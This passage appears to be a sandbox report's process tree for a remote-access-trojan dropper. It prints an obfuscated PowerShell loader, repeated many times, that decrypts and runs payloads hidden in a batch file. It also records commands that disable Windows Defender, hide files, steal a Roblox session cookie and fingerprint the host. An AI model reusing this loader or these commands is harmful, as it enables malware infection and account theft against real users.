$qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        23⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:1672
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        21⤵
        
        PID:2852
        
        C:\Windows\system32\net.exe
        
        net file
        22⤵
        
        PID:2628
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        23⤵
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        22⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        24⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        23⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        
        PID:288
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:1660
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        20⤵
        
        PID:2928
        
        C:\Windows\system32\net.exe
        
        net file
        21⤵
        
        PID:2752
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        22⤵
        
        PID:1260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:480
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        23⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        21⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        
        PID:2060
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        19⤵
        
        PID:1336
        
        C:\Windows\system32\net.exe
        
        net file
        20⤵
        
        PID:1556
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        21⤵
        
        PID:852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:2116
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        18⤵
        
        PID:2244
        
        C:\Windows\system32\net.exe
        
        net file
        19⤵
        
        PID:2256
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        20⤵
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:816
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        34⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        34⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        33⤵
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        31⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        31⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        30⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        29⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        
        PID:492
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        27⤵
        
        PID:316
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        26⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        26⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        24⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        23⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        21⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        20⤵
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        20⤵
        
        PID:996
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:2708
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        Views/modifies file attributes
        
        PID:2160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        21⤵
        
        PID:1988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:1760
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        21⤵
        
        PID:2112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        21⤵
        
        PID:2792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:1980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2936
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        21⤵
        Detects videocard installed
        
        PID:628
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:676
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:236
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        19⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        19⤵
        
        PID:568
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        17⤵
        
        PID:2320
        
        C:\Windows\system32\net.exe
        
        net file
        18⤵
        
        PID:764
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        19⤵
        
        PID:3004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:1032
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        16⤵
        
        PID:2800
        
        C:\Windows\system32\net.exe
        
        net file
        17⤵
        
        PID:3052
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        18⤵
        
        PID:3028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); 